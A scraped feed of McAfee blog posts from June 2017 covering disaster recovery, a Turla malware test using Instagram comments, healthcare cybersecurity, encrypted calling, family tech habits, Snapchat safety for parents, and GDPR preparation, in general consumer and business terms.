Netflix has gone even further by introducing testing in the form of their Simian Army which randomly tests the resiliency of their production environment against all manner of failures. And though cloud computing has provided a wealth of options for ensuring business continuity in the event of natural or manmade interruptions, disaster recovery (DR) is your last line of defense when every business continuity procedure and plan fails.

With outages costing enterprises up to $60 million a year, according to IHS Markit, DR planning is a critical component of every data center plan, even if the data center is in the cloud.

Furthermore, there are now regulations that require companies to have a DR plan in place. For instance, the Federal Financial Institutions Examination Council (FFIEC) has guidelines about the maximum allowable downtime for IT systems based on how critical downtime is to the business. If a disaster arises and a company isn’t prepared for it, the company can face fines and legal penalties in addition to the loss of service, data, and customer good will.

The ultimate goal of DR planning is to move “cold” data, complete copies of the data center frozen at a point in time, to the most cost effective location possible that provides for meaningful SLA recovery if/when necessary. These copies are then constantly updated to ensure any subsequent changes to the production environment are replicated to the DR environment.

Before moving forward with DR planning, organizations must look at industry-specific regulations such as HIPAA or the Sarbanes-Oxley Act to determine the right hosting infrastructure for their data. For example, strict data sovereignty and security requirements prevent organizations from saving personal data to the cloud if that data leaves the country of residence at any time.

After evaluating these requirements, it may be that the CIO will see that hybrid cloud makes the greatest financial and risk permissive option for that organization. Where previously, “cold” data was moved to tape for offsite storage, cloud based cold storage provides for cost effective retention of data and quicker recovery in the event of a disaster.

Implementing a hybrid IT infrastructure where data is backed up to the cloud – private or public – enables IT to continue to control and align the appropriate levels of data performance, protection, and security across all environments. By replicating data to the cloud and/or other physical sites, organizations can quickly recover operations to that facility when a primary site outage occurs.

Even in the absence of natural disasters, one potential disaster that is wreaking havoc on sensitive enterprise data today is ransomware – malware that takes the victim’s data hostage until ransom is paid. However, organizations with backup/DR solutions as simple as snapshot management software can use it to combat ransomware as part of the DR plan.

The concept is rooted in user-driven data recovery, and fights ransomware with its read-only feature that prevents encryption of the snapshot by an outside source. The protection occurs in the background for added reassurance and halts the need to pay cyber criminals for taking data hostage, as users will have a point-in-time recovery from which to restore their uncompromised data.

These days it’s rarely a matter of if disasters will strike, rather when they will strike. Organizations must create and test a comprehensive DR plan to prevent the potential for lost productivity, reputation, and revenue for the business.

By understanding the threats to their data, taking compliance regulations into careful consideration and creating an all-encompassing DR strategy, organizations will be well positioned to quickly recover operations and avoid the consequences of downtime from any disaster.

 

This article was written by Mike Elliott from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post How to avoid a disastrous recovery appeared first on McAfee Blogs.

]]>
Cybercriminals Test Malware Through a Comment on Britney Spears’ Instagram Page https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-test-malware-through-a-comment-on-britney-spears-instagram/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-test-malware-through-a-comment-on-britney-spears-instagram/#respond Wed, 14 Jun 2017 16:52:00 +0000 https://securingtomorrow.mcafee.com/?p=75090 Oops, Trojan malware did it again. This time, it’s targeting popstar Britney Spears’ social media, specifically, her Instagram page. However, the Toxic singer wasn’t the victim of the attack, as her popularity was leveraged to help conduct the scheme (she made our Most Dangerous Celebrities list back in 2014). The Trojan malware, which was created …

The post Cybercriminals Test Malware Through a Comment on Britney Spears’ Instagram Page appeared first on McAfee Blogs.

]]>
Oops, Trojan malware did it again. This time, it’s targeting popstar Britney Spears’ social media, specifically, her Instagram page. However, the Toxic singer wasn’t the victim of the attack, as her popularity was leveraged to help conduct the scheme (she made our Most Dangerous Celebrities list back in 2014). The Trojan malware, which was created by a well-known hacking group named Turla, actually made its way into the comment section of the princess of pop’s Instagram in the hope of potentially tricking innocent users.

So, how exactly does this ploy work? Leveraging a recently discovered backdoor found in a fake Firefox extension, the cybercriminals instruct the malware to scroll through the comments on Spears’ photos and search for one that had a specific hash value. When the malware finds the comment it was told to look for, it converts it into a malicious Bitly link. This infected comment on Spears’ post doesn’t look exactly normal, but most people would think it’s just spam. That is, unless they click it. If someone does in fact click on the link, they’ll be directed to a site that’s known to be the hacking group’s “watering hole.”

The good news is — experts have said this is simply just a test by the group. However, this ploy reminds us that cybercriminals are getting creative with how they leverage social media to conduct attacks, and how one malicious link can direct users to scams or unsafe areas of the internet.

Therefore, to avoid malicious links and to ensure you use social media safely, follow these tips:

-Be careful what you click. Whether it’s a link in the comments section of Instagram or a site sent from an unknown email, it’s crucial you’re always wary of clicking on unknown links. These links can carry malware, or redirect you to a malicious site. So, if a link doesn’t come from someone you know, it’s best to just err on the side of caution and avoid clicking all together.

-Secure your own social media. Make sure you’re not hit one time with malware by locking down your own personal social media accounts. Spears’ account was leveraged by cybercriminals because her account is public, so always remember to change your social media account settings to private whenever possible. That way, you can control who can friend you and comment on your pictures.

-Use a comprehensive security solution. Whether you’re scrolling through Instagram on your phone or skimming Facebook on your laptop, ensure all of your devices are protected from cyberattacks by using a comprehensive security solution like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Cybercriminals Test Malware Through a Comment on Britney Spears’ Instagram Page appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-test-malware-through-a-comment-on-britney-spears-instagram/feed/ 0
Health providers need new security focus to protect patient data https://securingtomorrow.mcafee.com/business/safeguard-data/health-providers-need-new-security-focus-to-protect-patient-data/ Tue, 13 Jun 2017 23:20:50 +0000 https://securingtomorrow.mcafee.com/?p=75061 Incidents of cyber attacks against medical devices are inevitable, and healthcare providers are not prepared for the eventuality. In fact, in general, healthcare organizations are focusing all their efforts of protecting the wrong thing. Keeping patients safe should dictate providers’ security efforts, but healthcare organizations are more likely to take steps that protect data so …

The post Health providers need new security focus to protect patient data appeared first on McAfee Blogs.

]]>
Incidents of cyber attacks against medical devices are inevitable, and healthcare providers are not prepared for the eventuality. In fact, in general, healthcare organizations are focusing all their efforts of protecting the wrong thing.

Keeping patients safe should dictate providers’ security efforts, but healthcare organizations are more likely to take steps that protect data so they can meet HIPAA requirements, said presenters last week at a security session at the annual meeting of the Society for Imaging Informatics in Medicine.

“Threats to patients and patients’ health are becoming more real,” says James Whitfill, MD, chief medical officer for Innovation Care Partners, a provider organization in Arizona.

The recent WannaCry ransomware attack helped to show the vulnerability of radiology equipment and other devices, Whitfill says. The attack encrypted Bayer MedRad devices at two U.S. healthcare organizations; the devices are power injector systems that monitor contrast agents that improve the quality of imaging scans.

“As providers, we should be concerned with actual patient health, not just protected health information (PHI),” Whitfill says. “We need to be making a shift from not worrying about policies and procedures to when our patients might be targeted by potentially harmful events.”

Research already has show that insulin pumps and infusion devices could be compromised, but cyber attackers might be able to exploit systems that influence patient care, such as computerized provider order entry and pharmacy systems. “What happens if someone gets into those systems that destroys inventory, changes records of patients’ allergies?” Whitfill says. “Or with surgical systems, what if attack damages equipment? There are a lot of potential threats here that could cause harm or death to patients.”

Provider security efforts need to take a fresh look at what attackers are looking to achieve, says Ted Harrington, executive partner for Independent Security Evaluators, a research firm that has taken an intensive look at security practices in healthcare.

“We look at things from the perspective of the adversary,” Harrington says. “A lot of security in healthcare is focused on compliance. WannaCry demonstrated that there are some real security issues in healthcare and other industries as well. Ransomware is not just a data issue – it does inhibit the ability to access data, but it is fundamentally a patient care issue.”

Harrington believes healthcare organizations need to refocus security efforts on protecting patient health, evolving away from a pure focus on protecting data that helps them to comply with HIPAA statutes.

“Protecting patient data along is insufficient to protect patient health,” he says. “For example, if you could attack something that could influence the way a physician behaves (such as information systems), that could compromise patient health. Some information systems are well protected, but there are so many different ways that someone could work his way through these layers of defense without even touching the things that are well protected.”

 

This article was written by Fred Bazzoli from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Health providers need new security focus to protect patient data appeared first on McAfee Blogs.

]]>
 We’ve Mastered Encrypted Messaging, So Are Encrypted Calls Next? https://securingtomorrow.mcafee.com/consumer/mobile-security/encrypted-calling/ https://securingtomorrow.mcafee.com/consumer/mobile-security/encrypted-calling/#respond Tue, 13 Jun 2017 13:00:56 +0000 https://securingtomorrow.mcafee.com/?p=74997 We’ve all heard the names before – WhatsApp, Viber, Telegram, Wire, Signal, Allo… with so many cyberattacks in the news recently, people have begun to rely on encrypted messaging apps to protect their privacy from potential hackers. These services secure end-to-end connections using varying tactics and levels of encryption – you may find yourself questioning …

The post  We’ve Mastered Encrypted Messaging, So Are Encrypted Calls Next? appeared first on McAfee Blogs.

]]>
We’ve all heard the names before – WhatsApp, Viber, Telegram, Wire, Signal, Allo… with so many cyberattacks in the news recently, people have begun to rely on encrypted messaging apps to protect their privacy from potential hackers. These services secure end-to-end connections using varying tactics and levels of encryption – you may find yourself questioning what any of that means. How do you encrypt your messages? Can anyone do it? What is being protected when you use an encrypted messaging system? If encrypted messaging is so great, why isn’t everyone using encrypted messages? It sure could put an end to all the celebrity phone hacks and government information leaks…  Here’s what you should know about encryption, and find the answers to all your questions.

When people encrypt their communications, it means that only the sender and the recipient can see one another’s messages. While the message is in transit, it cannot be decoded or unraveled by outsiders or the maker of the application, which allows for privacy and security. Some apps do this by protecting individual messages sent to and from the device, some have encryption built in, and others offer a “secret” mode that can be switched on and off. Certain apps, namely Wire and Signal, encrypt messages by design. By installing and signing into the app, all communications are automatically encrypted.

People use encryption for all kinds of communication – for a long time, these apps could only offer encryption for text-based chat, but introducing encrypted calls has been natural next-step and layer of protection in today’s digital world. Encrypted calls would be highly valuable, with the ability to thwart any snooping. However, developing the technology to create such protection for voice calls has proven difficult for programmers.

One of the main challenges that developers face is mastering internet-based calls, which still are not the most reliable way to communicate. Wi-Fi or Ethernet connections are the most stable, but many people still use cellular data to make VoIP (or Voice Over Internet Protocol) calls. In 2014, Signal, one of the many platforms offering encrypted communication, began to offer encrypted calling despite the complications with dropped calls and connection reliability, as did Wire. When WhatsApp introduced encrypted calls and video chat to their one billion users in 2016, other secure messaging apps finally began to pick up the pace and develop secure calling services of their own.

So, now that both encrypted texting services and encrypted calling services have been developed, it seems like all of our calls and texts should be secured by encryption, no questions asked. However, there are many factors slowing down adoption among potential users, one of the main reasons being that both parties must be using the same system for end-to-end encryption to function. Think about it this way – you may find an app that you love to use, but it might be difficult to convince all your friends and family to go through the steps to downloading and using the new app regularly. Everyone has their preferences, and getting everyone in your life to be on the same page can be difficult. Now, expand that to everyone in their lives – and so on, and so forth.

The resolution to this particular problem would be to fully open source these encryption products, so that people can communicate securely within different interfaces and applications. Developers can implement this by making all end-to-end encryption protocols the same, so they could speak to each other cross-product. While some small companies have adopted the Open Secure Telphony Network, or “OTSN,” many of the larger names in encryption – like Skype, Google, and Apple – have decided to brave the world of secure communication on their own, and forego open sourcing (much to the chagrin of people who need complete and total security). The potential security flaws with open-source code can be reason enough for these larger companies to privatize their communications, which defeats the whole purpose. Until developers find the right solution, what’s the best way to keep your private communications safe?

  • Avoid Risky Wi-Fi. Don’t trust unsecured Wi-Fi networks when sending personal information. While it’s great in theory that Wi-Fi is almost always readily available, those unsecured networks are an easy target for hackers to gain access to hundreds of personal devices. If you send personal information over an open network, you don’t know who could be spying on your device – or who could be sharing your data.
  • Keep Your Secrets to Yourself. Generally, it’s a good idea to keep any super sensitive data off mobile devices and messaging apps. Besides not knowing who might be spying on your phone, devices can get lost or stolen, and physically broken into. There are many ways your data can be stolen from a phone, but if you never keep it there in the first place, you’re much more likely to keep it secure.
  • Security Software Goes a Long Way. I highly recommend trusting a security software to have your back as a last resort. McAfee Mobile Security, which is free for Android and iOS, will warn you if you’re about to connect to an unsecured Wi-Fi network. That way, you’ll be more cautious if you are about to send any personal information over your phone.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post  We’ve Mastered Encrypted Messaging, So Are Encrypted Calls Next? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-security/encrypted-calling/feed/ 0
Unplugging: How Small Tech Shifts Can Make a Big Impact on a Family Vacation https://securingtomorrow.mcafee.com/consumer/family-safety/how-small-technology-shifts-can-make-a-huge-impact-on-your-family-vacation/ https://securingtomorrow.mcafee.com/consumer/family-safety/how-small-technology-shifts-can-make-a-huge-impact-on-your-family-vacation/#respond Tue, 13 Jun 2017 12:00:45 +0000 https://securingtomorrow.mcafee.com/?p=74773 The smartphone is the one item that automatically ignites an inner struggle as we pack for that long-awaited family vacation. On the one hand, we know we’d be trailblazers destined for an unforgettable family vacation if we “accidentally” left our phone on the bed and took off. On the other hand, that little glowing device …

The post Unplugging: How Small Tech Shifts Can Make a Big Impact on a Family Vacation appeared first on McAfee Blogs.

]]>
Unplugging vacationThe smartphone is the one item that automatically ignites an inner struggle as we pack for that long-awaited family vacation.

On the one hand, we know we’d be trailblazers destined for an unforgettable family vacation if we “accidentally” left our phone on the bed and took off. On the other hand, that little glowing device is trip central. It houses our itinerary, maps, boarding passes, medical information, instant bank account access, and frankly, the best doggone camera most of us have ever owned.

For most of us, our relationship with our smartphone is one that will likely never move beyond the “it’s complicated” phase — especially when it comes to the unplugging conversation.

As parents, we all nod in agreement when given the litany of good reasons to unplug on vacation.

We all need to get our faces out of our phones and onto each other.
Family time comes first.
We can’t get this precious time back.
The benefits of unplugging outweigh the drawbacks (uh…right?).

Survey: More Travelers Unplugging

According to a recent McAfee study more and more travelers are acting on their desire to unplug and experience the direct benefits of disconnecting.

An impressive 81% of individuals reported they unplugged on vacation in the past year and felt that their vacation was more enjoyable because of it.

The Family Factor

Most parents — 51% according to the survey — believe that devices should take a back seat on vacation. Still, the survey revealed that 77% of parents allow their children to use devices while traveling and 73% monitor device usage. Of the devices people are most comfortable leaving at home on vacation, 72% opted for laptops, 27% said phones, and 6% said they were unwilling to leave any device behind.

The top reasons individuals unplugged on vacation:

  • 69% to be in the moment
  • 65% to relieve stress
  • 44% to take a break from work
  • 36% out of respect for those around them

To know that the world won’t stop if we unplug, that our stress will go down, and that our family relationships and fun will simultaneously rise, sounds heavenly, right?

So why don’t even more of us simply unplug? What are we so afraid of?

As a well-intentioned parent who’s been at this for a while and I’ve noticed a self-defeating pattern that may help answer that question.

It’s all comes down to balance.

We can’t find balance as parents (and families) because we are striving for perfection; comparing ourselves and aiming for impossible standards. So many of our best parenting goals get sidelined because we fail to make balance an intricate part of any important change.

~ ~ ~

Your reasoning might sound like this:Unplugging vacation

We tried to unplug on our vacation, which lasted about two hours. We have no discipline so why even try?

We 
unplugged for two days, and everyone nearly ripped each other’s heads off. Unplugging is not a good idea for our family.

 I can’t tell the kids to unplug because I can’t unplug. It is what it is. I have to stay connected for emergencies (and Solitare).

We connected over dinner, and that was good enough. Unplugging is not worth the fight. It’s just easier letting everyone do what he or she wants to do.

 ~ ~ ~

In these scenarios (anyone nodding yet?) there’s absolutely no balance. It’s black- and-white thinking, and it does nothing to bring about positive changes that move us closer to our goal of quality time.

So how about this family vacation you strive for balance over perfection when it comes to unplugging?

You might be surprised at how a few small shifts can make some pretty significant differences in the quality of time you spend together.

Five ways to enjoy a ‘less-tech’ vacation

Define balance. The first step in successfully unplugging might be to define balance. Balance, according to the dictionary is “a state in which opposite forces are equal and placed in correct proportion.”

What balance means to your family in the context of unplugging is this: Unplug appropriately and not entirely (Whew – did anyone else just feel the weight lift?) Or, opt for less tech over no tech. Everything-or-nothing thinking says, “Unplug 100%” while a more balanced approach might be “Let’s unplug for the next six hours as we explore the caves and give ourselves 30 minutes tonight after dinner to check our phones.”Unplugging vacation

Agree (together) on tech-free zones. Together, discuss and establish what you want your less-tech vacation to look like. If connecting during family meals is important to you, then agree as a family to unplug for all meal times while on vacation. If Bobby needs his YouTube on the six-hour plane ride, then that may be part of the plan. If Beth needs to text her boyfriend each night for 30 minutes, then that may be an important addendum to keep everyone happy. Remember: Progress is more important than perfection when it comes to unplugging and making necessary compromises as a family.

Make unplugging fun. Depending on the age of your kids, unplugging may seem like a punishment. You need only point out a dinosaur fossil, and younger kids will forget about their phones. Teens, however, may require a little more coaxing to unplug. So make it fun. Play a game. For every full day spent unplugged, let your child choose a fun activity like collecting shells or time at an arcade. If mom’s the tech addict, then promise a pedicure or an extra-long nap. For the email-addicted Dad, maybe unplugging for the day means extra fishing or hammock time — uninterrupted, of course.

Adjust settings, delete apps. Change your phone settings to reduce distractions. Turn off 1) Push notifications 2) Wi-fi locator 3) Email and emergency alerts. Delete 1) All social media phone apps. That’s right, delete. Why not? There’s no reason to be checking social media when you are on vacation and posting your photos while out of town just isn’t wise. Deleting your social media app icons on your phone does not delete your accounts. You can redownload them when you get home. Encourage your kids to do the same while still allowing them they can text and check in with close friends if needed.Unplugging vacation

The 10-minute rule. Hey, any habit is tough to break. So, when you feel the urge to fire up your tech on vacation, give yourself 10 minutes before doing so and replace that urge with an alternate activity. Jump in the ocean, take a walk, pick up a book, meditate, journal, play a game, or browse local shops. If you are on a road trip, play a game with your family or strike up a great conversation. Here’s a few conversation starters for those long road trips to help you out.

What are some things your family does to make it easier to unplug while on vacation? Please share your wisdom!

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post Unplugging: How Small Tech Shifts Can Make a Big Impact on a Family Vacation appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/how-small-technology-shifts-can-make-a-huge-impact-on-your-family-vacation/feed/ 0
The 5-Minute Parents’ Guide To Snapchat https://securingtomorrow.mcafee.com/consumer/family-safety/5-minute-parents-guide-snapchat/ https://securingtomorrow.mcafee.com/consumer/family-safety/5-minute-parents-guide-snapchat/#respond Tue, 13 Jun 2017 07:13:41 +0000 https://securingtomorrow.mcafee.com/?p=73679 OK – we’ve all heard about Snapchat and know that our kids love it. But how many of us really know how it works? Well, read on. I’ve put together a 5-minute overview that will get you up to speed ASAP. So strap yourself in and let’s get hour heads around this together. What Is …

The post The 5-Minute Parents’ Guide To Snapchat appeared first on McAfee Blogs.

]]>
OK – we’ve all heard about Snapchat and know that our kids love it. But how many of us really know how it works? Well, read on. I’ve put together a 5-minute overview that will get you up to speed ASAP. So strap yourself in and let’s get hour heads around this together.

What Is Snapchat?

Snapchat is essentially a messaging app that’s very much designed for capturing life in the moment. Users send fund and spontaneous texts, photos or videos that all disappear after a short period of time. Anything that is sent is referred to as a ‘Snap’. Snaps can be sent to one or more friends.

Now a Snap doesn’t just have to be a Snap. It can be dressed up with test, emojis and doodles (free-form drawings). One can also add filters, lenses and stickers to make Snaps more visually appealing. Geofilters are a particularly popular way to customise Snaps at specific locations and events worldwide. You can even create one for your own event. In fact, my boys inform me that they are essential for anyone having an 18th or 21st birthday party!

One of the biggest differences between Snapchat and its cousins Facebook and Instagram is that there is no ‘Like’ option on Snapchat. This is because Snaps are designed to disappear.

How Big Is Snapchat?

According to the latest available stats there are 158 million daily users on Snapchat, with 2.5 billion Snaps sent every day. It is the 5th most used social media site in Australia with 1 in 6 Aussies using it daily. So it’s worth investing some in!

How Old Do You Need To Be To Use It?

Like most social media platforms, the ‘legal’ age of use for Snapchat is 13, a by-product of US legislation called the Children’s Online Privacy Protection Act (COPPA). The legislation came into effect in 2000 and is unapologetically committed to giving parents control over what information is collected from their children online.

Now while this legislation is US-based, websites hosted overseas must comply with COPPA if they are directed to children in the US. In effect, if your kids are visiting the same sites that US kids would frequent, then COPPA applies.

However, parenting experts and even the OECD believe that this decision is really best left up to the parents, who should factor in a child’s maturity, resilience and level of responsibility before giving the green light or not, irrespective of age.

Isn’t It Used For Sexting?

When Snapchat first hit our screens in 2011 it was instantly pigeon-holed as a haven for sharing raunchy pictures. Since then it has broadened its offering and now competes in the mainstream social media space alongside apps such as Kik, WhatsApp and Facetime.

However, it still CAN absolutely be used for sexting so please don’t think it is all sunshine and smiles!

How To Interact On Snapchat?

Just like Facebook, when you start out on Snapchat you ‘friend’ people you know. Once you’re established friends, you can then share Snaps. However, there is a ‘follow’ option which allows users to follow celebrities and sporting teams. One of my boys says this can provide great content to on-share with friends!

I’ve Heard Of Stories – What Are They?

Users can compile their Snaps into a Story which has a 24-hour life. This could be a video, one Snap, or hundreds of Snaps. When a Snap is taken, users have the option of adding it to their Story.

Live Stories are a montage of Snaps submitted for Snapchatters from events around the world such as a concert or sporting event.

Is There A Messaging Option On Snapchat?

One-on-one chat is an option on Snapchat. Just like Snaps, chats are cleared when the recipient leaves the chat screen. But be aware – users can choose to save messages they would like to keep.

What’s Snapcash?

In 2014 Snapchat introduced a person-to-person payment feature that allows users to transfer money between themselves easily. Currently this is only available to US users over 18. So no need to worry about this in Australia yet. Phew!

What Do I Need To Tell My Kids?

Here are my top tips for helping your kids use Snapchat safely.

Saving Snaps

Even though Snaps technically disappear, there are a few ways they can remain permanent: the creator could save the Snap before sending it; the viewer could take a screenshot; or anyone could take a picture of the screen with another camera, or use another tool or app to save a copy. So, it is imperative your kids understand to never send anything illegal or that could get themselves or others into trouble. In an ideal world they wouldn’t do this, but sometimes you have to keep the conversation real!

Privacy Settings

The default ‘My Friends’ setting only allows users to send and receive media from users they have added to their Friends list. I highly recommend that anyone under the age of 18 continue with the setting. Check out this link if you need more help.

Personal Information

Just like any activity on social media, sharing personal information such as phone numbers, home address, name of school or parents’ details could have devastating consequences such as identity theft or even stalking. Please ensure your kids know how to keep their info tight.

Stick to Real Friends

As on all social media platforms, there are ways on Snapchat for your kids to find people they don’t know – and vice versa. Ensure your kids know that is is not OK to meet up with people they meet online. Online only friends are NOT real friends!

Nudity

I know this might be an embarrassing conversation but you need to have it. Your kids need to know that exchanging nude or explicit images of anyone under the age of 18 – including themselves – is a serious crime. In most states of Australia, anyone caught and charged could be placed on the Sex Offenders Registry. So please ensure they truly understand the consequences here.

Problems

If your child’s settings are set to My Friends and they still receive abusive Snaps from another user, get involved! Take a screenshot of the interactions then help your child block the user. You will then also need to report them to Snapchat’s Safety Team.

 

Well done! You are now ready to enter the world of Snapchat. Remember using the same technology and social media your kids do gives you real insight into their world while earning yourself a bit of tech cred! What are you waiting for? Join up today!

Take care

Alex xx

The post The 5-Minute Parents’ Guide To Snapchat appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/5-minute-parents-guide-snapchat/feed/ 0
Public-private partnership critical to thwarting cyber threats https://securingtomorrow.mcafee.com/business/neutralize-threats/public-private-partnership-critical-to-thwarting-cyber-threats/ Mon, 12 Jun 2017 23:02:25 +0000 https://securingtomorrow.mcafee.com/?p=75014 While a set of more than 100 recommendations to help increase cybersecurity across the healthcare industry might seem like overkill, the co-chair of a task force that developed them believes the challenges are urgent and wide-ranging, requiring immediate and aggressive action. “There are so many areas that need to be addressed, quite frankly, given the …

The post Public-private partnership critical to thwarting cyber threats appeared first on McAfee Blogs.

]]>
While a set of more than 100 recommendations to help increase cybersecurity across the healthcare industry might seem like overkill, the co-chair of a task force that developed them believes the challenges are urgent and wide-ranging, requiring immediate and aggressive action.

“There are so many areas that need to be addressed, quite frankly, given the complexity of healthcare,” says Theresa Meadows, co-chair of the Health Care Industry Cybersecurity Task Force, which was created by Congress through the Cybersecurity Act of 2015 to examine the sector’s vulnerabilities.

Specifically, the task force’s June 2 report, which was sent to several congressional committees, calls for a unified effort by both the public and private sectors to counter the growing cyber threats that are putting patient information and safety at risk.

“Real cases of identity theft, ransomware and targeted nation-state hacking prove that our healthcare data is vulnerable,” states the report, which was finalized prior to last month’s WannaCry ransomware attack that compromised more than 300,000 computers worldwide in at least 150 countries, including the National Health Service in the United Kingdom.

“A breach is not a matter of if, but when,” warns Meadows. “Everybody is going to experience some level of this type of issue. One of the most important takeaways from the task force report is knowing your plan of action when a situation occurs so you can mitigate and recover from such an event.”

Meadows, who is also senior vice president and chief information officer at Cook Children’s Health Care System, contends that the panel’s intention was to provide actionable recommendations designed to increase security across the industry – each recommendation has one or more action items for implementing them.

The task force’s 100-plus recommendations are organized into six high-level imperatives, including increasing the security and resilience of medical devices and health IT. In particular, Meadows observes that medical devices are a “tough not to crack because most institutions have medical devices for many years,” adding that, on average, it’s a 10- to 15-year investment timeframe.

“Our security posture has really changed over those 15 years, and those devices were not designed to have all of those mitigation factors in place, nor were they designed to be fully integrated to electronic health records,” she notes. “Some of the mandates around Meaningful Use have really driven up the risk around medical devices because they weren’t initially designed that way. The key is beginning to replace those legacy devices so we can have them on the most current software and security without it being cost-prohibitive.”

According to Meadows, another high-level healthcare cybersecurity imperative is improving information sharing of industry threats, weaknesses and mitigations. “Some organizations wouldn’t want to report a security incident because of how it might affect them from a consumer standpoint, but there are a lot of good mechanisms to share critical information to fix and prevent issues without identifying the institutions that reported it,” she says.

Meadows believes that one of the strongest recommendations made by the task force is for the Department of Health and Human Services to create a cybersecurity leader role within HHS to align industry-facing efforts for healthcare cybersecurity. She makes the case that many different programs and agencies within and outside of HHS are responsible for cybersecurity, but it’s critical to have a single person who is responsible for coordinating these activities.

Overall, the successful implementation of these recommendations “will require adequate resources and coordination across the public and private sector,” finds the task force’s report.

However, the task force points out that healthcare organizations “often lack the infrastructure to identify and track threats, the capacity to analyze and translate the threat data they receive into actionable information, and the capability to act on that information.”

It’s a serious problem for healthcare organizations, which have a responsibility to secure their systems, medical devices and patient data from these kinds of cyber attacks with razor-thin operating margins, and, as a result, “cannot afford to retain in-house information security personnel, or designate an information technology staff member with cybersecurity as a collateral duty,” according to the task force.

Meadows acknowledges that security is a “harder sell” for C-level healthcare executives “because it’s really an insurance policy and there’s no perceived ROI to having good security posture and hygiene,” particularly in smaller organizations facing resource constraints.

However, organizations making the decision to “prioritize cybersecurity within the healthcare industry requires culture shifts and increased communication to and from leadership, as well as changes in the way providers perform their duties in the clinical environment,” concludes the task force report.

“People are beginning to see that it’s more of a priority,” adds Meadows. “It’s going to take all of us working together to really make some headway on these issues on how to improve security in healthcare. I hope organizations will really take to heart some of the recommendations that have been made and begin to put implementation plans in place.”

 

This article was written by Greg Slabodkin from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Public-private partnership critical to thwarting cyber threats appeared first on McAfee Blogs.

]]>
Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 4: Ihr Sicherheitskontrollzentrum (SOC) https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-4-ihr-sicherheitskontrollzentrum-soc/ https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-4-ihr-sicherheitskontrollzentrum-soc/#respond Mon, 12 Jun 2017 22:27:27 +0000 https://securingtomorrow.mcafee.com/?p=75182 Dies ist der vierte Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.   Eine der wichtigsten Anforderungen gemäß der neuen Datenschutz-Grundverordnung ist die Meldung von Kompromittierungen. Die Meldung einer Kompromittierung setzt natürlich die Fähigkeit voraus, eine Datenkompromittierung zu erkennen – und das ist …

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 4: Ihr Sicherheitskontrollzentrum (SOC) appeared first on McAfee Blogs.

]]>
Dies ist der vierte Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.

 

Eine der wichtigsten Anforderungen gemäß der neuen Datenschutz-Grundverordnung ist die Meldung von Kompromittierungen. Die Meldung einer Kompromittierung setzt natürlich die Fähigkeit voraus, eine Datenkompromittierung zu erkennen – und das ist nicht immer so einfach.

 

Untersuchungen von McAfee Labs haben gezeigt, dass mehr als 53 Prozent aller Vorfälle extern festgestellt werden. Zudem wurde bei einer SANS-Umfrage zur Reaktion auf Zwischenfälle im Jahr 2016 ermittelt, dass nur rund 16 Prozent der Sicherheitskontrollzentren (SOCs) als ausgereift erachtet wurden.

 

Aus eigener Erfahrung kann ich bestätigen, dass bei vielen Sicherheitsprozessen die Suche nach Malware-Bedrohungen im Vordergrund steht und es sehr wenige Anwendungsfälle für Insider-Bedrohungen oder Datenexfiltration gibt. Dies führt zu einer weiteren alarmierenden Statistik. In einem Bericht des Ponemon Institute von 2016 wurde festgestellt, dass nur 24 Prozent der Unternehmen in der Lage sind, einen unautorisierten Zugriff auf kritische Systeme in weniger als 24 Stunden zu erkennen.

 

All das veranlasst mich zu glauben, dass die meisten Sicherheitsprozesse nicht für die DSGVO bereit sind.

 

In diesem Beitrag habe ich einige wichtige Schritte für Sicherheitsprozesse aufgeführt, damit diese besser für die DSGVO gerüstet sind.

 

Die Entwicklung verstehen

 

Der erste Schritt zur Verbesserung besteht darin, den aktuellen Zustand zu verstehen und einen Plan zur Weiterentwicklung zu erstellen. Ich habe dieses einfache Dreistufenmodell entwickelt, um Unternehmen dabei zu unterstützen, ihre derzeitigen Sicherheitsprozesse zu bewerten – insbesondere im Hinblick auf die Erkennung von Datenkompromittierungen und die entsprechende Reaktion darauf.

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 4: Ihr Sicherheitskontrollzentrum (SOC) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-4-ihr-sicherheitskontrollzentrum-soc/feed/ 0
Preparing for GDPR in 2017, Part 4: Your SOC https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-4-soc/ https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-4-soc/#respond Mon, 12 Jun 2017 16:00:40 +0000 https://securingtomorrow.mcafee.com/?p=74612 This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 2, 3) One of the key requirements under the new General Data Protection Regulation is breach reporting. Of course, to report a breach implies you have the capability to detect …

